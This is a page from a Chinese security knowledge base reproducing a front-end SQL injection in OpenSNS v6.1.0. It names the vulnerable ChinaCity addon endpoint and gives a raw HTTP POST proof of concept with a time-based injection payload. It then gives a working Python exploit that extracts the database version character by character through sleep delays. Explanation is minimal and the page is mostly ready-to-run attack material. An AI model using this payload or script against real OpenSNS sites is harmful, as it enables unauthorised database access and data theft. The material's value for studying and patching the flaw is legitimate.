menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 097-OpenSNS chevron_right 003-OpenSNS v6.1.0 前台sql注入.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    003-OpenSNS v6.1.0 前台sql注入.md
    2.1 KB / 2021-07-17 00:01:22
        # OpenSNS v6.1.0 前台sql注入
    
    ### 一、漏洞简介
    
    ### 二、漏洞影响
    
    OpenSNS v6.1.0
    
    ### 三、复现过程
    
    vul url
    
    
    ```
    http://url/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/home/addons/_addons/china_city/_controller/china_city/_action/getcity.html
    ```
    
    ![](images/15891996692656.png)
    
    
    poc
    
    
    ```bash
    POST /index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetcity.html HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
    Content-Length: 116
    Accept: */*
    Cookie: 
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,und;q=0.7
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.95.131
    Referer: http://192.168.95.131/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/ucenter/config/index.html
    X-Requested-With: XMLHttpRequest
    Accept-Encoding: gzip
    
    cid=0&pid%5B0%5D=%3D%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29and+3+in+&pid%5B1%5D=3
    ```
    
    ![](images/15891996906465.png)
    
    
    ![](images/15891996953541.png)
    
    
    Vulnerability file
    
    Addons/ChinaCity/Controller/ChinaCityController.class.php:50
    
    ![](images/15891997036710.png)
    
    
    ThinkPHP/Library/Think/Db.class.php:772
    
    ![](images/15891997112567.png)
    
    
    ![](images/15891997151591.png)
    
    
    exp
    
    
    ```bash
    import requests
    from requests import exceptions
    
    url="http://192.168.95.131/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/home/addons/_addons/china_city/_controller/china_city/_action/getcity.html"
    
    
    header={'X-Requested-With':'XMLHttpRequest'}
    # proxies={'http':'127.0.0.1:8080'}
    flag=''
    for i in range(1,50):
        for j in range(32,128):
            try:
                data={
                    'cid':0,
                    'pid[0]':"=(select if(ord(substr((select version()),{},1))={},sleep(10),0))AND 3 IN  ".format(i,j),
                    'pid[1]':3
                }
                # print data['pid[0]']
                r=requests.post(url,data=data,headers=header,timeout=5)
    
            except exceptions.Timeout :
                flag+=chr(j)
                print flag
    ```
    
    ![](images/15891997304643.png)
    
    
    
    
    links
    file_download